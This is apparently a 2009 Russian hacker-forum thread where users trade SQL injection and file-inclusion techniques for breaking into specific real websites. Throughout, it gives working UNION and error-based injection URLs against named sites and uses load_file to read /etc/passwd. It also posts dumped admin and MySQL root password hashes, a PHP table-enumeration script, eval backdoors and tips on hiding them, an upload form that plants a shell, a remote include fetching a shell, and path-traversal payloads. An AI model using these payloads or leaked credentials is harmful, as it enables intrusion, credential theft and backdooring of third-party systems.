К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
eD']К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
почему к сожалению?
mailbrush
05.12.2009, 16:24
eD']Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx.
Очень просто, к примеру запрос:
...
mysql_query("UPDATE `news` SET `title` = '".$_POST['title']."', 'text' = '".$_POST['text']."' ");
...
При вводе
Title
test title
Text:
test text
запрос в БД будет
UPDATE `news` SET `title` = 'test title', `text` = 'test text'
Если же сделать такой ввод:
Title
test title', `text` = concat_ws(0x3a,user(),database(),version())/*
Text:
test text
В БД пойдет запрос:
UPDATE `news` SET `title` = 'test title', `text` = concat_ws(0x3a,user(),database(),version())/*', `text` = 'test text'
И в тексте новости будет юзер, бд и версия.
PS: Это будет работать при magic_qoutes = Off.
mailbrush
05.12.2009, 18:22
2mailbrush
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
у него в запрос станет:
`text` = 'concat_ws(0x3a,user(),database(),version())/*' ...
И в тексте новости будет:
concat_ws(0x3a,user(),database(),version())/*
Почему у него в запрос должны стать кавычки? Откуда они взялись там?
Как можно сделать в булке/ipb кол-во сообщений отрицательным(-1)?
mailbrush
05.12.2009, 23:07
Как можно сделать в булке/ipb кол-во сообщений отрицательным(-1)?
Причем здесь уязвимости?
Cybersteger
06.12.2009, 00:00
В поле http://www.site.ru/pop/search.cgi?q='
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.
Это SQL инекция ? Тогда как раскрутить?
[x60]unu
06.12.2009, 00:02
В поле http://www.site.ru/pop/search.cgi?q='
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 at /usr/local/apache/htdocs/pop/search.cgi line 111.
Это SQL инекция ? Тогда как раскрутить?
скорее всего да
если там идут числовые значения то можно попробовать так
http://www.site.ru/pop/search.cgi?q=2-1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=1
http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=2
ну а так сайт в ЛС если не трудно:)
mailbrush
06.12.2009, 10:37
Кинь сайт в личку, или пробуй:
http://www.site.ru/pop/search.cgi?q=1)+order+by+1%23
есть функция load_file
magic_quotes_on
удалось прочитать несколько файлов, вот только их содержимое несовсем понятно што из этого можна извлечь полезного (в мозиле у меня все отобразилось в непонятных кодах,в гугл хроме нормально)
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file%280x2f7661722f61646d2f 77746d70%29,3,4,5--
/var/adm/wtmp
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f75746d70), 3,4,5--
/var/adm/qacct
ILYAtirtir
06.12.2009, 16:23
админка:
forester:*676243218923905CF94CB52A3C9D3EB30CE8E20D
bsimpson:*81BDE0E8E0BA1F502F94C27035B496267B88E712
mysql:
root:*E73484FBEEB33C026E5ADBCA26E267B837C846E3:Y
-есть функция load_file
-што из этого можна извлечь полезного
обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
ЗЫ Задай себе вопрос- что я хочу? ;)
x']обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
ЗЫ Задай себе вопрос- что я хочу? ;)
да мнебы конфиги, или возможно логи прочитать)
но я с етой системой незнаком(
Такой вопрос по mysql-inj...
Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)(т.е. есть иньекция в параметре update)
Как это сделать? И возможно ли?
да мнебы конфиги, или возможно логи прочитать)
но я с етой системой незнаком(
никс ситемка ;)
------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f7061737377 64),3,4,5-- /etc/passwd
-------------------
Такой вопрос по mysql-inj...
Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)
Как это сделать? И возможно ли?
какими средствами ты распологаешь? доступ? права? :confused:
x']какими средствами ты распологаешь? доступ? права? :confused:
Подправил пост (точно сформулировал теперь)
mailbrush
06.12.2009, 18:58
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
Spyder, а ТЫ залил шелл? )
x']никс ситемка ;)
------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f7061737377 64),3,4,5-- /etc/passwd
-------------------
да я /etc/passwd в первую очередь прочитал)
но там всеравно сильно невыжмеш с нее(
кавычка слешируется)
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
Spyder, а ТЫ залил шелл? )
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
mailbrush
06.12.2009, 19:22
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
А ты не сомневайся ;)
сомниваюсь штобы Spyder залил...
каким образом?
через логи?
reverse ip => выбирай сайты - читалка у тебя есть.
можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку :)
хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
:o )
сложи 1+1 )
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)
x']reverse ip => выбирай сайты - читалка у тебя есть.
можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку :)
хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
:o )
сложи 1+1 )
http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)
да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...
mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)
mailbrush
06.12.2009, 19:53
да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...
mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)
У тебя нету нестандартного мышления ;)
У тебя нету нестандартного мышления ;)
с чего ты взял? :cool:
mailbrush
06.12.2009, 19:56
С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")
PS: http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,2,3,4,load_file(0x2F746D702F6D61 696C6272757368)
можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='
Настройте пожалуйста скрипт.
[/PHP]<?php
set_time_limit(0);
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name) ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='50';//Конечное значение счетчика
$set['h']='www.engelmt.de';//Хост
if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];
for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре
//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";
$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);
//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));
//Выводим инфу на экран
echo($dt."\r\n");
flush();
}
?>
атрибут космический- бруто технику описывали уже с минимальным количеством запросов :(
p.r0phe.t
07.12.2009, 14:47
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
Jokester
07.12.2009, 14:51
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Прочтением статей мб?
https://forum.antichat.ru/thread104591.html
Вопрос №2
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_EN CRYPT(user,password)),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+ 1,1/*
p.r0phe.t
07.12.2009, 14:59
Спасибо! =)
Jokester
07.12.2009, 15:18
?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_EN CRYPT(user,password)),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+ 1,1/*
И что, работает так?
Тебе тоже не мешает, кстати, статьи перечитать :) Ну или по синтаксису что-то
И что, работает так?
Тебе тоже не мешает, кстати, статьи перечитать :) Ну или по синтаксису что-то
Незнаю как у вас, но у меня заработало, я непомню на каком именно сайте, но работало 100 %.
Возможно условия разные просто.
Кстате точно надо повторить...
ps
Сгуглил даже, http://forum.prologic.su/index.php?showtopic=3612&st=0&p=13019&#entry13019
Jokester
07.12.2009, 15:27
Незнаю как у вас, но у меня заработало, я непомню на каком именно сайте, но работало 100 %.
Возможно условия разные просто.
Кстате точно надо повторить...
ps
Сгуглил даже, http://forum.prologic.su/index.php?showtopic=3612&st=0&p=13019&#entry13019
Возможно просто синтаксис нужен правильный, или у хакеров и так покатит?
http://dev.mysql.com/doc/refman/5.1/en/encryption-functions.html#function_aes-decrypt
p.r0phe.t
07.12.2009, 15:34
И что, работает так?
Тебе тоже не мешает, кстати, статьи перечитать :) Ну или по синтаксису что-то
нет не работает,я с твоего поста смотрел.
Pashkela
07.12.2009, 15:37
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,unhex(hex(concat_w s(0x3a,user,password))),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
Root-access
07.12.2009, 15:37
Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,convert(concat_ws(";",user,password)+using+cp1251_general_ci),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
Как-то так. Не проверял.
p.r0phe.t
07.12.2009, 15:40
всем спасибо,сделал так:
?id=-10256'+union+select+1,2,3,4,5,6,user,cast(password +as+binary),9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27+from+mysql.user+limit+3,1/*
p.r0phe.t
07.12.2009, 15:50
Ещё вопрос,какими способами,имея лоадфайл (какие конфиги почитать) найти путь до сайта?
ОС: CentOS
Ещё вопрос,какими способами,имея лоадфайл (какие конфиги почитать) найти путь до сайта?
ОС: CentOS
Linux
CentOS, Fedora (Redhat-системы)
/etc/httpd/conf/httpd.conf
/etc/passwd
/etc/groups
вообщем читай все што сможеш а там подсмотриш путь)
P.S. Узнай версию апача...
вот пути в этой теме
https://forum.antichat.ru/thread49775.html
перебирай или сиптом или на darkc0de были какието переборщики
p.r0phe.t
07.12.2009, 17:21
/etc/httpd/conf/httpd.conf
Путями и не пахнет
P.S. Узнай версию апача...
А зачем? ну 2.2.3...
p.r0phe.t
07.12.2009, 17:32
И ещё,скажите что означает такая ошибка и как с ней бороться?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND num_begin < '' AND num_end > ''' at line 1
Путями и не пахнет
А зачем? ну 2.2.3...
я тебе скажу зачем....
на разных версиях апача может путь распологатся по разному!!! соответственно затем...
пральна построй запрос! дето наверна кавычка лишняя
p.r0phe.t
07.12.2009, 17:39
пральна построй запрос! дето наверна кавычка лишняя
Посмотрите:
http://naidi-abonenta.ru/activation
p.r0phe.t
07.12.2009, 17:39
я тебе скажу зачем....
на разных версиях апача может путь распологатся по разному!!! соответственно затем...
Путь к конфигу знаю,увы в конфиге нет путей к сайту нифига...
p.r0phe.t
07.12.2009, 17:50
а на што тут смотреть?
на скул инъект наверно в поле ввода номера =)
http://podium.md/news_show.php?id=33'
доброе время суток уважаемые ачатовцы, хочу попросить помощи в раскрутке скули данного ресурса, либо я очень устал и уперся в банальность либо проблема в самом ресурсе.Заранее благодарен.
2Gorev
раскручивай как блинд
http://podium.md/news_show.php?id=33+and+substring(version(),1,1)=5
думаю нормального вывода не добиться
[x60]unu
08.12.2009, 21:49
http://podium.md/news_show.php?id=33/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)
пробуй крутить как блинд
2[x60]unu
где там таблы?
http://podium.md/news_show.php?id=33+and+(select+name_const((select +1),1))
Incorrect arguments to NAME_CONST
этот способ в данном случае не прокатит для вывода таблиц и тп.
http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIM IT+0,1)--
методом тыка угадал таблы
admin,news,user
попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py
тама дето и хелп к ней лежал
Nightmarе
08.12.2009, 22:22
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков.
Pashkela
08.12.2009, 23:08
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
Nightmarе
08.12.2009, 23:23
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
Код полный.
$uploadfile может быть что угодно. как
$uploadfile = 'file.lol';
так и $uploadfile = $filename;
не в нём смысл.
Подскажите пожалуйста, можно ли как то обойти следующее в SQL
Select a from DB-nomer1.user - примерный запрос
Проблема в экранировании тере "-" и в итоге получаю ошибку
Какие есть возможности?
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков.
Нет.
Ded MustD!e
09.12.2009, 06:55
Подскажите пожалуйста, можно ли как то обойти следующее в SQL
Select a from DB-nomer1.user - примерный запрос
Проблема в экранировании тере "-" и в итоге получаю ошибку
Какие есть возможности?
взять имя БД в обратные кавычки `DB-nomer1`.user, если они не фильтруются, то должно сработать.
2 Ded MustD!e - Thx, помогло!!!
LokbatanLi
09.12.2009, 07:28
извините за вопрос ест какой то софт или ехплоит для знать сколько columns
извините за вопрос ест какой то софт или ехплоит для знать сколько columns
Есть - http://forum.antichat.ru/showthread.php?t=24918
Totgeliebt
09.12.2009, 08:24
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!
Статья - http://forum.antichat.ru/threadnav43966-1-40.html
Сканер - rmb -> delete
Totgeliebt
09.12.2009, 08:56
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!
Статья - http://forum.antichat.ru/threadnav43966-1-40.html
Сканер - rmb -> delete
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
Значит пункт 2 - удалить сканер
2Strilo4ka
так фильтрацию обходить
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
Зачем, если можно
SELECT table_name FROM information_schema.tables WHERE table_schema=0x666f72756d
?
Jokester
09.12.2009, 12:55
2Strilo4ka
так фильтрацию обходить
Какую? Фильтрацию чего так можно обойти?
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
Господа, если не знаете что ответить или не уверены, не нужно этого делать, я уже по 100 раз всех просил об этом.
========================
Strilo4ka
Это делается для получения результата в "правильной" кодировке, и никакую фильтрацию это обойти не позволит. Ты наконец прочитаешь хоть какую-нибудь статью, или так и будет это продолжаться?
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
OC win , стоит VertrigoServ
Почему то я замешкался вот тут:
confgs.php?e=ls; не выводит список файлов
confgs.php?e=pwd; тож нехочет показывать, но показывает phpinfo()
confgs.php?e=phpinfo();
Pashkela
09.12.2009, 17:48
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
HAXTA4OK
09.12.2009, 18:19
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как? :)
ЗЫ а там вообще WIN вместо ls у него dir вроде
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав
какие ls,pwd внимательнее:
OC win , стоит VertrigoServ
создай на своем компе:
<form enctype=multipart/form-data method=post action="http://lala/confgs.php?e=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form>
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как? :)
ЗЫ а там вообще WIN вместо ls у него dir вроде
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав
magic_quotes_gpc On On :(
какие ls,pwd внимательнее:
создай на своем компе:
А можно поподробние? :)
Pashkela
09.12.2009, 18:30
делай тогда как l1ght говорит и на будущее всегда юзай stripslashes, как сказал HAXTA4OK
Nightmarе
09.12.2009, 18:33
Да, забыл уточнить, когда делаем шелл в скриптах через Eval, то как лучше делать ?
Eval(stripslashes());
или
Eval(base64_decode());
Что посоветуете из этого? Я склоняюсь ко второму варианту но... хз хз
Illegal mix of collations for operation 'UNION'
Данную ошибку выдаёт при запросе:
UNION+SELECT+1,2,3,4,5,6,7,8,9,table_name,11+from+ information_schema.tables--
Iceangel_
09.12.2009, 18:54
Да, забыл уточнить, когда делаем шелл в скриптах через Eval, то как лучше делать ?
Eval(stripslashes());
или
Eval(base64_decode());
Что посоветуете из этого? Я склоняюсь ко второму варианту но... хз хз
Лучше евалом не бекдорить, используй альтернативные функции, типа preg_replace(), `` и т.п. . А насчет твоих вариантов, не вижу каких-либо преимуществ base64_decode, лишняя морока только... Ты ведь постом будешь отправлять команды бекдору? ;)
Данную ошибку выдаёт при запросе:
UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(table_nam e)),11+from+ information_schema.tables--
P.S. кучу раз это уже описывалось
eliteload
09.12.2009, 22:26
Здравствуйте.
есть вот такой код:
<?php
$lfi = $_GET['lfi'];
include ('page'.$lfi.'.php');
?>
возможно ли в данном случае проинклудить локальный фаил?(к примеру passwd). Если да то как?
и еще один момент:
<?php
if (file_exists('./path/'.$_GET['lfi'].'.php')) {
include ('./path/'.$_GET['lfi'].'.php');
}
?>
так же интересует возможность инклуда произвольного файла.
Пытаюсь отсечь расширение с помощью %00, ? и т.п. не помогает.
Root-access
09.12.2009, 22:37
Здравствуйте.
есть вот такой код:
<?php
$lfi = $_GET['lfi'];
include ('page'.$lfi.'.php');
?>
возможно ли в данном случае проинклудить локальный фаил?(к примеру passwd). Если да то как?
и еще один момент:
<?php
if (file_exists('./path/'.$_GET['lfi'].'.php')) {
include ('./path/'.$_GET['lfi'].'.php');
}
?>
так же интересует возможность инклуда произвольного файла.
Пытаюсь отсечь расширение с помощью %00, ? и т.п. не помогает.
?lfi=../../../../../../../etc/passwd%00
ИЛИ
?lfi=../../../../../../../etc/passwd///////[4096 раз /]///////////
eliteload
09.12.2009, 22:47
Root-access, я так понял это ответ на первый вопрос?
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
nightmare007
10.12.2009, 03:39
Здравствуйте.
В общем есть сервачек игровой один, на его сайте вкручена система голосования. Вкручена она таким образом...
Пройдя по ссылке:
_xттп://_host_/vote/voting.php
Вы попадаете на страничку голосования , нечего особого эта страничка не представляет, формочка куда надо вписать логин и пара кнопок.
Внутри этой странички встроен JScript:
...
<script language="javascript" type="text/javascript">
function game(){
log=document.forms["form1"].login.value;
window.open('http://_host_/vote/game.php?login='+log);
window.open('http://сайт_сюда_перекидывает');
}
<script>
...
<form name="form1">
<input type="text" name="login">
<input type="hidden" id="vid" name="id">
...
<input type="button" value="Проголосовать" onclick="game()">
...
значит после того как вы вписываете логин и тискаете кнопку "проголосовать", у вас открывается две страницы, одна из которых (_хттп://_host_/vote/game.php?login=логин) содержит содержит сообщение о том, что вам была вставлена кука и проголосовать повторно вы не сможете в течении "X" времени.
Кука выглядит вот так:
vote gday: 10
vote gh:00
vote gm:55
vote gmount: 12
Если исправить значения куки, допустим значение "vote gday" изменить с "10" на "фывфы" или на " ' " и перегрузить (_хттп://_host_/vote/game.php?login=Логин)
то выдает страницу с следующим текстом:
Warning: mktime() expects parameter 5 to be long, string given in /var/www/_host_/vote/game.php on line 23
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 27
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 28
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 29
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 30
Логин , спасибо за ваш голос ...
Если же перегрузить страницу без указания конкретного значения Login (_хттп://_host_/vote/game.php?login= ), то выдает страницу с таким тестом:
Warning: mktime() expects parameter 5 to be long, string given in /var/www/_host_/vote/game.php on line 23
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 27
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 28
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 29
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 30
, спасибо за ваш голос ...
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 2 in /var/www/_host_/vote/script.php on line 8
изменяя значения (gday,gh,gm,gmount):
vote gday: 10
vote gh:00
vote gm:55
vote gmount: 12
в результате страница ничем почти не изменяется, кроме первой записи:
Warning: mktime() expects parameter ->5 (1,2,3)<- to be long, string given in /var/www/_host_/vote/game.php on line 23
насколько я понимаю значения кук попадает в функцию mktime() в виде параметров, функция не может воспринять передаваемые параметры и выдает ошибку.
Терь вопрос является ли эта вся штука уязвимостью и как эту уязвимость можно использывать, имеетли место sql-inj и можно ли как нибудь достать расс рута mysql? Можно ли как нить залить шелл?
Пробовал через телнет конектится к серваку на 3306, оказалось что открыт удаленный доступ к MySQL.
Насколько мне известно на серваке (Unix,little-endian).
nightmare007, в куке хранится время, она не фильтруется, из-за этого ошибка. Скуля там врят ли, максимум XSS.
Ребят, помогите докрутить:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая.
Можно крутить и как слепую. Там многострочный запрос
Ded MustD!e
10.12.2009, 11:49
Ребят, помогите докрутить:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая.
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name '5.0.51a-24+lenny2'
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,passwor d)+from+users+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,passwor d)+from+users+limit+1),14)e)b)a)/**/and/**/'1'='1
Duplicate column name 'snakeye:2a63eca1020db4020c46be9b5dc8de4467d00912'
Root-access
10.12.2009, 12:46
Root-access, я так понял это ответ на первый вопрос?
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
Ну так можно ж еще слеш добавить в начале:
?lfi=/../../../../../../../etc/passwd%00
Iceangel_: разве это изменит ситуацию?
Iceangel_
10.12.2009, 14:24
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция:
include('page1.php/../../../../../../../etc/passwd%00.php');
При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
Root-access
